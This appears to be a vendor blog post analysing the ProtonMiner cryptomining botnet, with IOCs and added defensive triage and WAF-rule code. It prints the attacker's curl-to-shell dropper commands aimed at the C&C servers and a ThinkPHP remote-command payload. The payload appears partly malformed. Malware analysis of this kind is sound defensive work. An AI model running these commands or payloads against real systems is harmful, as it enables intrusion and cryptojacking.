ProtonMiner Gains Momentum via Expanded Attack Surface

Security is sometimes a very simple business: if you rely on weak passwords and run services as root, there is a high chance that someone will develop malware to hijack your database or web service.

This blog post provides a recent example of this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by the Alibaba Cloud security team, which has been extremely active since mid-February 2019. The post gives a clear analysis of the malware: how it infects a host, how it propagates to additional victims, its impact, and its recent distribution trend. It also offers security recommendations for avoiding it.

Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs

Background

Security researchers at Alibaba Cloud have recently detected an outbreak of a new cryptocurrency miner hijacker, which they named “ProtonMiner”. This miner was very likely created by the same attacker group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, but since mid-February we have seen its popularity grow considerably as it expanded its attack surface.

This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.

Infection Outline


Step 1: The attacker controls the compromised hosts and runs one of the following commands to download uuu.sh (or update.sh, which has identical content):

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner mines cryptocurrency on the compromised host, while the trojan keeps spreading to other, not yet compromised hosts.

Shell Script from a Stealthy Attacker

The uuu.sh script first tries to update /etc/devtools and then tests whether the current account has root privileges. Only when it is running as root does the main part of the script execute and mining start.

#!/bin/sh
# write the infection marker
echo 1 > /etc/devtools
# $rtdir is assigned earlier in the script (not shown in this excerpt);
# the test is the author's root check
if [ -f "$rtdir" ]
then
    echo "i am root"
    echo "goto 1" >> /etc/devtools
    # download & attack
fi

The other parts of the script consist of typical mining botnet behavior: it first detects and kills the processes of other mining groups, adds itself to crontab, and alters the iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in the following aspects:

  1. The attacker cleans up the command history after itself.

  2. The attacker uses many different ProtonMail addresses as usernames in the mining configuration file. ProtonMail is the world’s largest secure email service, and we named the botnet ProtonMiner after it. By using secure email addresses instead of a Monero wallet address as the mining username, the attacker makes it harder for security researchers to detect the threat, and to investigate the mining profits and the number of hosts compromised by the botnet.

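The host-side artifacts described above (the /etc/devtools marker, the crontab entry, the systemctI process name and the pool connection) can be checked from collected evidence. The following is an added example for this post, not the Alibaba Cloud team's tooling; it runs offline on text you gather from the host, and the indicator values come from the post's own IOC list.

```python
"""Host triage for the ProtonMiner artifacts described above (added example,
not the Alibaba Cloud team's tooling). Runs offline on text collected from a
host: /etc/devtools contents, a crontab dump, a process and a socket listing."""
import re

# Indicators taken from the post: C&C hosts, download path token, dropper
# names, propagation binary name and mining pool.
CNC_HOSTS = ("45.76.122.92", "207.148.70.143")
DOWNLOAD_TOKEN = "IOFoqIgyC0zmf2UR"
DROPPER_NAMES = ("uuu.sh", "update.sh")
PROPAGATOR = "systemctI"   # capital I, easily misread as systemctl
POOL = "xmr.pool.minergate.com:45700"


def devtools_is_marker(contents):
    """uuu.sh writes '1' to /etc/devtools and appends 'goto 1' when root."""
    lines = [l.strip() for l in contents.splitlines() if l.strip()]
    return lines[:1] == ["1"] and "goto 1" in lines


def suspicious_cron_lines(crontab):
    """Crontab entries that fetch the dropper or reference the C&C hosts."""
    hits = []
    for line in crontab.splitlines():
        if line.lstrip().startswith("#"):
            continue
        if (any(h in line for h in CNC_HOSTS) or DOWNLOAD_TOKEN in line
                or any(n in line for n in DROPPER_NAMES)):
            hits.append(line)
    return hits


def suspicious_processes(ps_output):
    """Lines running the propagator; token match so systemctl is not flagged."""
    pattern = re.compile(r"(^|[\s/])" + re.escape(PROPAGATOR) + r"(\s|$)")
    return [l for l in ps_output.splitlines() if pattern.search(l)]


def triage(devtools, crontab, ps_output, sockets):
    """Combine the checks; any truthy value deserves a closer look."""
    return {
        "devtools_marker": devtools_is_marker(devtools),
        "cron": suspicious_cron_lines(crontab),
        "processes": suspicious_processes(ps_output),
        "pool_connection": POOL in sockets,
    }
```

Feed it the output of `cat /etc/devtools`, `crontab -l` for each user, `ps -eo user,pid,args` and `ss -tnp`; an empty result for every key only means these particular indicators were not found.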

Propagation Method Analysis

The propagation module of ProtonMiner is named “systemctI” and is written in Go. Its main function is shown in the figure below:

[Figure: main function of the systemctI propagation module]

The trojan first initializes the IP list and the weak password list used for scanning. The initialization is done by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)


After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.


This is the list of impacted services and corresponding vulnerabilities:

Service - Vulnerability
Hadoop - Unauthorized access
Drupal - CVE-2018-7600
Redis - Unauthorized access
Spring Data Commons - CVE-2018-1273
SQL Server - Weak password
ElasticSearch - CVE-2014-3120, CVE-2015-1427
Weblogic - CVE-2017-10271
ThinkPHP - Two RCEs (Remote Command Execution), including CVE-2018-20062

For example, here is a ThinkPHP payload (the infected host name is masked for privacy reasons):

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
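A WAF or reverse proxy can recognise this delivery pattern from the pieces visible in the payload above: a POST to the ThinkPHP captcha route carrying a framework-internal parameter, and a curl-to-shell download from the C&C hosts. The rule below is an added example written for this post, not code from the article; it assumes the request has already been split into method, path, query string and body, and the sample requests in its test are constructed.

```python
"""Request-inspection rule for the ThinkPHP delivery shown above (added
example, not from the original article). Takes a request already split into
method, path, query and body, as a WAF or reverse proxy hands it over."""
from urllib.parse import parse_qs, unquote_plus

CNC_HOSTS = ("45.76.122.92", "207.148.70.143")   # from the post's IOC list
DOWNLOAD_TOKEN = "IOFoqIgyC0zmf2UR"              # dropper path token


def inspect_request(method, path, query, body):
    """Return the reasons a request looks like ProtonMiner delivery ([] = clean)."""
    reasons = []
    params = parse_qs(query)
    # Decode once so percent-encoded brackets and spaces do not evade the checks.
    decoded_body = unquote_plus(body)
    blob = unquote_plus(query) + "&" + decoded_body
    # ThinkPHP route abused in the post: POST to s=captcha carrying
    # framework-internal parameters such as server[REQUEST_METHOD].
    if (method.upper() == "POST" and path.endswith("/index.php")
            and params.get("s") == ["captcha"]
            and "server[REQUEST_METHOD]" in decoded_body):
        reasons.append("thinkphp captcha route with framework parameters")
    # Any reference to the dropper's hosting servers or path.
    if any(h in blob for h in CNC_HOSTS) or DOWNLOAD_TOKEN in blob:
        reasons.append("references ProtonMiner C&C download")
    # curl piped straight into a shell, with or without a space before sh.
    if "curl -fsSL" in blob and ("|sh" in blob or "| sh" in blob):
        reasons.append("curl-to-shell pipeline")
    return reasons
```

The first check fires on the exploitation attempt itself, even before any payload is downloaded; the other two fire on whatever route the attacker uses to deliver the same dropper command.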

Distribution Trend

After extending its attack surface, ProtonMiner’s distribution gained momentum and reached a peak of just over one thousand infections around mid-February of this year.


Figure 1: Daily distribution of devices infected by ProtonMiner

Security Recommendations

  1. We strongly advise you NOT to run database and web services under the root account. Furthermore, services like Redis and Hadoop should not be exposed to the public network.
  2. Mining botnets are very quick in updating themselves to contain new vulnerability payloads, and they create ubiquitous threats on the Internet. Alibaba’s Cloud Firewall is able to detect, block and protect from these kinds of threats.
  3. If you are concerned about your servers’ security, but do not have a security engineer to tell you what to do, you should give Alibaba’s Cloud Managed Security Service a try. Alibaba Cloud’s Security experts will help you clean up malware, improve configurations, and enhance overall security.

IOC

C&C servers:
45.76.122.92
207.148.70.143

Files:

Filename - md5
update.sh - ce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)
config.json - 26baedfa378af63a2a566a7f672d5276
systemctI - 359e7272c933c710476955508d687ad3
devtool - 5e6b6fcd7913ae4917b0cdb0f09bf539

Pool address:
xmr.pool.minergate.com:45700

Usernames at pool:
xjkhjjkasd@protonmail.com
dashcoin230cdd@protonmail.com
alksjewio@protonmail.com
23odi093dd@protonmail.com
olpeplckdd3@protonmail.com

Reference

https://www.alibabacloud.com/blog/protonminer-gains-momentum-via-expanded-attack-surface_594535?spm=a2c41.12636409.0.0
